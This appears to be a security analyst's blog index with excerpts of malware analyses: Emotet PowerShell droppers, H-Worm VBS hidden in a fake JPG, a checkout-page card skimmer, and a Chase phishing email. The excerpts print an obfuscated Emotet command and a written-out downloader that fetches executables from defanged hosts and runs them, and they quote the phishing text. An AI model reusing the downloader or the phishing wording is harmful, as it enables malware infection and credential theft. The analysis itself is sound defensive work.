Security Magic

Nothing earth shattering to report here, I just wanted to share the latest Emotet encoded powershell command and one simple way to decode it to extract the Stage 2 download links. I know, a lot of these obfuscated powershells can be easily decoded by simply using the write-host command, however, I do like to try different ways to reverse the obfuscation, as I think it just makes for a good analyst exercise. The powershell command is encoded as: POwerSHell ieX("$(sV 'ofs' '' )" +[STrInG]( '15x77-81I95>124O96I92O11x22-11-69!78J92>6J68>73-65>78-72t95t11x89t74!69O79>68t70-16-15>92J64-89x122t114!11J22t11!69O78x92t6-68-73t65-78>72J95H11>120t82!88t95H78>70-5O101-78!95>5x124V78J73!104I71t66-78!69x95O16H15I97x88t94t74>66>11x22I11>12x67x95H95>91x17O4H4I79x68>89J68-95x67J82I76V66I71J88t95>89t74V91O5O72x68H70!4I71-100J111O70x4I107!67J95I95J91t17I4>4t92J92J92O5!70t82I91H67!74>70I70I68O72H67V74t5!72O68...

Recently I have observed a few hosts which were attempting to POST data to this domain, albeit, unsuccessfully as this is not a valid domain. Everything about the data in the PCAP suggests Microsoft SmartScreen, such as the user agent and even the decoded hex in the HTTP request header: For example: 252F680074007400700073003a002f002f00700069006e0067002e002e0063006800650063006b0061007000700065007800650063002e006d006900630072006f0073006f00660074002e0063006f006d002f00770069006e0064006f00770073002f007300680065006c006c002f0061006300740069006f006e007300 Translates to https://ping..checkappexec.microsoft.com/windows/shell/actions Upon further investigation, I found that several hosts were attempting to query and unsuccessfully resolve this domain.  So I did some digging and the results for this ranged wildly: A Patent for reputation based software patentimages.storage.googleapis.com/pdfs/US8695092.pdf A suggestion that this is part of a Canon printer https://translate.googl...

As many have already noticed, over the last month Emotet has hit hard again. The deliveries are similar to before, an emial phish with a link, the link downloads a malicious document. The document, usually a malicious word document, uses VBA to build and execute a powershell command which then will download the next stage of infection. This used to be very simple to see, for example, older observed variants produced the following powershell: powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'hxxp://rghuston[.]com/gxrdcca/,http://lepolat[.]net/jk/,hxxp://mpny[.]tv/bjnmxh/,hxxp://cfclife[.]org/cfcwp/ulrpcpgx/,hxxp://rghuston[.]com/gxrdcca/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Ex...

I think many people have stumbled upon "less than secure" sites which claim to have a secure checkout. I can't even count how many times I've looked for some obscure items on the web and have come across a website which just seems a bit off. Yesterday I received a Snort alert which I often see on a compromised host:>ET TROJAN Likely Zbot Generic Post to gate.php Dotted-Quad What I instantly noticed in the transcript is that this isn't the normal POST that I see from Zeus. What I had seen was a GET request with users Credit Card and Billing information in the Request Header. See Screenshot: I've excluded the rest of the transcript, so as not to mention the site which is actually compromised at this time. However, I will say that it is very clear when looking at surrounding PCAPs from the source IP that the user was shopping for Building supplies. When looking at the websites Checkout page, I stumbled upon the following code: Click to...

H-Worm or Houdini Worm is a VB Script which uses obfuscation techniques in an attempt to hide  code. I'm not here to reinvent the wheel, there's already good articles on H-Worm, including  This Fireeye article . I will however point out that with the right indicators in Snort, network traffic can be used to pin down a host which may be beaconing to a known URI structure for H-Worm, including the POST is-ready indicator. I had observed one host which had a VBS file in startup named adobe_flash_player.vbs. Since this host had tripped my snort signature, I decided to look at this as a file of interest. This particular file had a couple layers of obfuscation. In this screen capture we see the file appears to be a JPG file (although, it doesn't actually display, it really appears to be garbage) This is an attempt to have an analyst potentially brush it off as a malformed JPG. However, if we scroll down to the end of the file we see something interesting. ...

Last month I analyzed a weaponized word document that came through e-mail. This is nothing special, I see these everyday, but this one gave me something interesting to play with. The file  https://www.virustotal.com/en/file/387ea7a4f82d7ba686ca8018684fd2fd803a9c05a4a47130845431d383d81b36/analysis/  launches the following VBS Script https://www.virustotal.com/en/file/fdf6b117b55302ecb7da95b68e9ca5e6882c12cbf41829dfb56688bb94595ea3/analysis/ The script performs HTTP traffic: GET http://ecovalduloir[.]com/fw[.]jpg (No longer available). When it was available, the file has an MD5 of bdd3cf6f227a368a5412f11a10831136,  see  https://www.virustotal.com/en/file/ce0e737d3eddbbb102867063f0b163d12358075691407542f9aecafa064538dc/analysis/ At first glance the JPEG look OK, here is a screen capture of what the file image looks like. When we look at this file through a hex editor it becomes more interesting. Here is the beginning, looks OK. Here is a snippet a...

A couple e-mails came into my one of my inboxes today that I wanted to quickly share. These e-mails contained subjects lines like this "Chase Alert! [2568828843]" and contained an e-mail body which read the following: This e-mail has been sent to EMAILADDRESS@hotmail.com by JPMorgan Chase & Co. Online Banking Chase ALERT: Due to an unusual number of failed login attempts, your online banking access has been temporarily suspended. To restore your account access please click: Log On to Chase Online and proceed with the verification process. IMPORTANT NOTE: If we do not receive the appropriate account verification within 24 hours, you will need to visit a Chase branch to restore your account access. Sincerely, Chase Online(SM) © Copyright JPMorgan Chase & Co. 2016 The links in these e-mails have a URI structure similar to these: hxxp://snacktast.info/99212afb7404efc9f6acd3f17238db46/index.php hxxp://snacktast.info/b9cc2a03f094783974f35b51bf7464e4/index.php...